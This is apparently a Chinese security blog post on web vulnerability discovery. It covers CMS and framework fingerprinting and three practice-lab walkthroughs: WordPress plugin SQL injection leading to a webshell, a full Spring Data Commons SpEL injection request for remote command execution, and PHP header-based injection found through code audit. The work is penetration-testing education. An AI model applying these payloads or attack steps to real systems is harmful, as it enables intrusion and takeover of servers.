漏洞发现(二)Web应用之漏洞探针类型利用修复

前言

现在的服务器基本都是跑Web程序提供网页服务,所以web应用的漏洞挖掘也是重中之重,那么挖掘也是利用相应的思路进行挖掘。

Web站点程序判断

再拿到一个web站点,先判断该程序属于以下那种情况:

已知 CMS

如常见的 dedecms.discuz,wordpress 等源码结构,这种一般采用非框架类开发,但也有少部分采用的是框架类开发,针对此类源码程序的安全检测,我们要利用公开的漏洞进行测试,如不存在可采用 白盒代码审计自行挖掘。

开发框架

如常见的 thinkphp,spring,flask 等开发的源码程序,这种源码程序正常的安全测试思路:先获取对 应的开发框架信息(名字,版本),通过公开的框架类安全问题进行测试,如不存在可采用白盒代码审 计自行挖掘。

未知 CMS

如常见的企业或个人内部程序源码,也可以是某 CMS 二次开发的源码结构,针对此类的源码程序测 试思路:能识别二次开发就按已知 CMS 思路进行,不能确定二次开发的话可以采用常规综合类扫描 工具或脚本进行探针,也可以采用人工探针(功能点,参数,盲猜),同样在有源码的情况下也可以 进行代码审计自行挖掘。

针对不同的类型web站点有不同的测试方式。

判断方式

在线网站:这种站点有很多 直接输入网址 在线进行识别CMS 识别网站url:CMS识别 – online tools

比如本站:

图片[1]-漏洞发现(二)Web应用之漏洞探针类型利用修复-Drton1博客

CMS识别小工具:

cmseek:扫描本站示例:

图片[2]-漏洞发现(二)Web应用之漏洞探针类型利用修复-Drton1博客

下载地址:GitHub – Tuhinshubhra/CMSeeK: CMS Detection and Exploitation suite – Scan WordPress, Joomla, Drupal and over 180 other CMSs

其他工具:

https://github.com/F6JO/CmsVulScan

https://github.com/wpscanteam/wpscan

案例演示

1、已知CMS非框架类–WordPress

地址:WordPress插件漏洞分析溯源_SQL注入_在线靶场_墨者学院_专注于网络安全人才培养 (mozhe.cn)

图片[3]-漏洞发现(二)Web应用之漏洞探针类型利用修复-Drton1博客

我们通过页面特殊信息判断为该CMS为wordpress:

图片[4]-漏洞发现(二)Web应用之漏洞探针类型利用修复-Drton1博客

或者利用工具扫描

图片[5]-漏洞发现(二)Web应用之漏洞探针类型利用修复-Drton1博客

得知是wordpress后我们利用专门扫描wordpress漏洞的工具wpscan进行扫描,这里需要去wpscan官网去申请一个apitoken才能用,进行扫描:

图片[6]-漏洞发现(二)Web应用之漏洞探针类型利用修复-Drton1博客

发现一个sql注入:打开漏洞链接http://www.exploit-db.com/exploits/24552/

找到注入点:

图片[7]-漏洞发现(二)Web应用之漏洞探针类型利用修复-Drton1博客

拼接一下得出注入路径:http://124.70.71.251:45854/wp-content/plugins/comment-rating/ck-processkarma.php?id=1&action=add&path=a

开sqlmap:

图片[8]-漏洞发现(二)Web应用之漏洞探针类型利用修复-Drton1博客

跑密码:

图片[9]-漏洞发现(二)Web应用之漏洞探针类型利用修复-Drton1博客

登录后台:

图片[10]-漏洞发现(二)Web应用之漏洞探针类型利用修复-Drton1博客

写入木马:

图片[11]-漏洞发现(二)Web应用之漏洞探针类型利用修复-Drton1博客

蚁剑连接拿key:

图片[12]-漏洞发现(二)Web应用之漏洞探针类型利用修复-Drton1博客
图片[13]-漏洞发现(二)Web应用之漏洞探针类型利用修复-Drton1博客

2**、已知框架类非CMS类–Javaweb框架Spring**

Spring Data是一个用于简化数据库访问,并支持云服务的开源框架,Spring Data Commons是Spring Data下所有子项目共享的基础框架。Spring Data Commons 在2.0.5及以前版本中,存在一处SpEL表达式注入漏洞,攻击者可以注入恶意SpEL表达式以执行任意命令。

靶场环境Vulhub – Docker-Compose file for vulnerability environment

访问页面时,是一个spring常见的错误页面

图片[14]-漏洞发现(二)Web应用之漏洞探针类型利用修复-Drton1博客

通过扫目录的方式发现敏感页面/users

图片[15]-漏洞发现(二)Web应用之漏洞探针类型利用修复-Drton1博客

在输入一些数据后点击注册,并使用burp抓包,修改数据包为如下payload并发送:

图片[16]-漏洞发现(二)Web应用之漏洞探针类型利用修复-Drton1博客
POST /users?page=&size=5 HTTP/1.1
Host: x.x.x.x:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 130
Origin: http://x.x.x.x:8080
Connection: close
Referer: http://x.x.x.x:8080/users
Cookie: settingStore=1630480512401_0
Upgrade-Insecure-Requests: 1

username[#this.getClass().forName("java.lang.Runtime").getRuntime().exec("命令")]=&password=&repeatedPassword=

即可进行RCE。

3.未知CMS非框架类的代码审计—qqyewu_php

图片[17]-漏洞发现(二)Web应用之漏洞探针类型利用修复-Drton1博客

首页刷新 打开数据库监控查看状态:

发现此条查询语句 可能存在前端控制变量:

图片[18]-漏洞发现(二)Web应用之漏洞探针类型利用修复-Drton1博客

进行查找该语句: 找到该函数

图片[19]-漏洞发现(二)Web应用之漏洞探针类型利用修复-Drton1博客

继续查找ip如何传入:

发现获取ip的函数

图片[20]-漏洞发现(二)Web应用之漏洞探针类型利用修复-Drton1博客

查看获取ip函数getIP的源码:

图片[21]-漏洞发现(二)Web应用之漏洞探针类型利用修复-Drton1博客

此时就很熟悉了 就是php获取ip那几个字段 这几个字段我们都是可以控制的,直接构造注入就好:

图片[22]-漏洞发现(二)Web应用之漏洞探针类型利用修复-Drton1博客
图片[23]-漏洞发现(二)Web应用之漏洞探针类型利用修复-Drton1博客

Web探针

Xray: xray是一款功能强大的安全评估、漏洞扫描工具

下载地址:https://github.com/chaitin/xray

AWVS :AWVS14.1.2下载安装教程(2021.3.6版本)_an1r的博客-CSDN博客_wvsc替换文件

© 版权声明
THE END
喜欢就支持一下吧
点赞12 分享
评论 抢沙发

请登录后发表评论